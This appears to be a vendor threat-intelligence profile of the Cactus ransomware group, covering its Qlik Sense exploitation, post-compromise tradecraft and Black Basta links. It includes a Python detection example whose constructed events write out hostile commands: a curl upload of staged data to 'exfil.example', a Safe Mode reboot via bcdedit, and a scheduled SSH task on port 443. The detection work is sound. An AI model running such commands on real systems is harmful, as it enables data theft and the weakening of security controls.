CACTUS
Cactus is a financially motivated ransomware group active since at least March 2023 and associated with double-extortion and big-game-hunting operations. The group is referred to as the “Cactus Group” and operates a data leak site called “Cactus Blog.” Reporting in the provided content links Cactus to worldwide ransomware activity and to the broader ransomware affiliate ecosystem, including overlap or migration involving former Black Basta affiliates and actors tracked as Blitz Brigantine, which has been described as an affiliate for both Black Basta and Cactus operations.

Cactus has been observed using multiple initial access methods. Since at least November 2023, it has actively targeted vulnerable internet-facing Qlik Sense servers for initial access, including exploitation associated with CVE-2023-41265, CVE-2023-41266, and CVE-2023-48365. Joint research cited in the content identified numerous vulnerable and likely compromised Qlik Sense servers globally, including Dutch victims. Separate reporting also states that Cactus received access from the financially motivated initial access group ToyMaker, which Talos says previously handed access to Maze, Egregor, and Cactus.

Post-compromise, Cactus has been observed conducting endpoint, server, and file enumeration; using a PowerShell WSMAN discovery script; archiving data with 7z; and exfiltrating data with curl and other transfer tools. Talos reported that Cactus likely exfiltrated customer data, deleted command history and other artifacts, removed the earlier-created “support” account, deployed remote administration tools including eHorus Agent, AnyDesk, RMS Remote Admin, and OpenSSH, and created scheduled tasks for recurring OpenSSH reverse shell access over port 443. The group also created unauthorized accounts such as “whiteninja,” modified Winlogon registry keys, and used bcdedit and shutdown commands to reboot hosts into Safe Mode, likely to weaken security controls before ransomware deployment.
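The post-compromise chain described above (Safe Mode reboot via bcdedit and shutdown, Winlogon registry changes, scheduled tasks running OpenSSH over port 443, 7z staging and curl exfiltration) is the kind of behaviour a defender can correlate per host rather than alert on one command at a time. The Python below is an added example and not code from the reporting or from any vendor named on this page; the event shape, hostnames, paths and command lines are constructed, and [REDACTED] stands in for arguments the example deliberately does not reproduce.

```python
"""
Added detection example for the Cactus post-compromise behaviours listed in the
profile: Safe Mode reboots via bcdedit and shutdown, Winlogon registry changes,
scheduled tasks running OpenSSH over port 443, data staging with 7z and
exfiltration with curl. Every record below is CONSTRUCTED for this example;
[REDACTED] marks arguments that are deliberately not reproduced.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    """Minimal process-creation record (field names are this example's own)."""
    host: str
    user: str
    image: str
    command_line: str


# One rule per behaviour named in the reporting. Matching is on the command
# line, so the same logic applies to Sysmon Event ID 1, Security 4688 with
# command-line auditing, or EDR telemetry once mapped into this shape.
RULES = {
    # bcdedit ... safeboot {minimal|network}: configures the next boot for Safe Mode
    "safe_mode_boot_config": re.compile(r"\bbcdedit(?:\.exe)?\b.*\bsafeboot\b", re.I),
    # shutdown /r: the reboot that activates that configuration
    "forced_reboot": re.compile(r"\bshutdown(?:\.exe)?\b.*\s/r\b", re.I),
    # reg add / *-ItemProperty against the Winlogon key
    "winlogon_registry_change": re.compile(
        r"(?:\breg(?:\.exe)?\s+add\b|\bSet-ItemProperty\b|\bNew-ItemProperty\b).*\\Winlogon\b", re.I),
    # schtasks /create whose action runs ssh with port 443 (order-independent lookaheads)
    "scheduled_task_ssh_443": re.compile(
        r"\bschtasks(?:\.exe)?\b(?=.*/create\b)(?=.*\bssh(?:\.exe)?\b)(?=.*\b443\b)", re.I),
    # 7z a ...: archive creation used to stage data before exfiltration
    "archive_staging_7z": re.compile(r"\b7z(?:a|r)?(?:\.exe)?\s+a\b", re.I),
    # curl with an upload or POST switch: the exfiltration step
    "curl_upload": re.compile(
        r"\bcurl(?:\.exe)?\b.*(?:\s-T\s|\s--upload-file\s|\s-F\s|\s-d\s|\s--data)", re.I),
}


def match_rules(event: ProcessEvent) -> list[str]:
    """Return the names of every rule whose pattern matches the command line."""
    return [name for name, rx in RULES.items() if rx.search(event.command_line)]


def rules_by_host(events: list[ProcessEvent]) -> dict[str, set[str]]:
    """Aggregate distinct matched rule names per host over the whole event window."""
    hits: dict[str, set[str]] = {}
    for ev in events:
        hits.setdefault(ev.host, set()).update(match_rules(ev))
    return hits


def flag_hosts(events: list[ProcessEvent], min_rules: int = 2) -> list[str]:
    """Hosts on which at least `min_rules` distinct behaviours were seen.

    Any single rule (a backup job using 7z, an admin rebooting a server) is
    noisy on its own; the chaining described in the reporting is what makes
    the combination worth an alert.
    """
    return sorted(h for h, names in rules_by_host(events).items() if len(names) >= min_rules)


SAMPLE_EVENTS = [  # constructed records, not observed telemetry
    ProcessEvent("WS01", r"CORP\svc-backup", r"C:\Windows\System32\bcdedit.exe",
                 "bcdedit /set {default} safeboot network"),
    ProcessEvent("WS01", r"CORP\svc-backup", r"C:\Windows\System32\shutdown.exe",
                 "shutdown /r /f /t 0"),
    ProcessEvent("WS01", r"CORP\svc-backup", r"C:\Windows\System32\reg.exe",
                 r'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" '
                 r'/v Shell /t REG_SZ /d "[REDACTED]" /f'),
    ProcessEvent("SRV02", r"CORP\whiteninja", r"C:\Windows\System32\schtasks.exe",
                 r'schtasks /create /sc minute /mo 10 /tn "Updater" '
                 r'/tr "C:\Windows\System32\OpenSSH\ssh.exe -p 443 [REDACTED]" /ru SYSTEM'),
    ProcessEvent("SRV02", r"CORP\whiteninja", r"C:\ProgramData\7z.exe",
                 r"7z.exe a -r C:\ProgramData\out.7z \\fs01\finance"),
    ProcessEvent("SRV02", r"CORP\whiteninja", r"C:\ProgramData\curl.exe",
                 r"curl.exe -T C:\ProgramData\out.7z https://exfil.example/upload"),
    # benign look-alikes: one behaviour each, never chained
    ProcessEvent("WS03", r"CORP\jdoe", r"C:\Program Files\7-Zip\7z.exe", r"7z.exe a backup.7z D:\docs"),
    ProcessEvent("WS04", r"CORP\jdoe", r"C:\Windows\System32\shutdown.exe", "shutdown /s /t 60"),
    ProcessEvent("WS05", r"CORP\admin", r"C:\Windows\System32\bcdedit.exe", "bcdedit /enum"),
]


if __name__ == "__main__":
    for host, names in sorted(rules_by_host(SAMPLE_EVENTS).items()):
        print(f"{host}: {sorted(names) or '-'}")
    print("flagged:", flag_hosts(SAMPLE_EVENTS))
```

With the default threshold of two distinct behaviours, WS01 and SRV02 are flagged while the lone 7z backup on WS03 and the scheduled shutdown on WS04 are not; lowering `min_rules` to 1 trades that precision for earlier warning on the first Safe Mode or Winlogon change.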
The content also describes Cactus intrusions using social engineering tradecraft associated with Microsoft Teams impersonation and Quick Assist abuse. Trend Micro reported a Cactus case in which attackers contacted the victim via Teams, delivered split .bpx payloads that were reassembled into a ZIP archive, and abused OneDriveStandaloneUpdater.exe for DLL sideloading to deploy BackConnect malware. In that case, Cactus used the same BackConnect command-and-control infrastructure seen in Black Basta-related activity, moved laterally with SMB and WinRM, compromised ESXi hosts, deployed socks.out assessed as likely SystemBC, used WinSCP, and sent a ransom note by email identifying themselves as the Cactus Group. Cactus has also been associated in the provided content with abuse of legitimate remote access and administration software, including AnyDesk and Splashtop, and with use of Restart Manager (RstrtMgr.dll) to terminate interfering processes. Additional reporting notes a newer Cactus ransomware variant demonstrating advanced command and scripting techniques. The content does not attribute Cactus to a nation state. It consistently describes the group as part of the criminal ransomware ecosystem, including affiliate migration and rebranding dynamics involving Black Basta and other ransomware operations.
Know when an actor pivots toward your sector
Mallory correlates actor tradecraft and target patterns against your stack, your sector, and your geography. See overlap before they land.
Tradecraft
32 distinct techniques observed across reporting, grouped by tactic.
Associated vulnerabilities
3 CVEs this actor has used in observed campaigns. 3 of them exploited in the wild.
For those looking for in-depth coverage of these exploits, the Arctic Wolf blog provides detailed insights into the specific vulnerabilities being exploited, notably CVE-2023-41266, CVE-2023-41265 also known as ZeroQlik, and potentially CVE-2023-48365 also known as DoubleQlik.
Retrieving this file with the ?.ttf extension trick has been fixed in the patch that addresses CVE-2023-48365... Nevertheless, this is still a good way to determine the state of a Qlik instance, because if it redirects using 302 Authenticate at this location it is likely that the server is not vulnerable to CVE-2023-48365.
Observables
37 indicators attributed to this actor: domains, IPs, hashes, and other artifacts pulled from reporting.
Recent activity
20 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Named as one of the groups that absorbed affiliates after the Black Basta collapse; later cited as an example of rebranded affiliate activity retaining the same tooling and behavior.
Ransomware team described as collaborating with Black Basta, including payments and operational coordination.
Named as one of the ransomware families used by former BlackBasta affiliates after BlackBasta’s shutdown.
Referenced as a ransomware group actively exploiting CISA Known Exploited Vulnerabilities.
The version that knows your environment.
Match sector + geo + tech-stack targeting against your real footprint.
Every observed MITRE ATT&CK technique, grouped by tactic.
Families this actor is known to deploy, with IOCs and behavior.
CVEs this actor has used in known campaigns.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Domains, IPs, and hashes tied to this actor, refreshed continuously.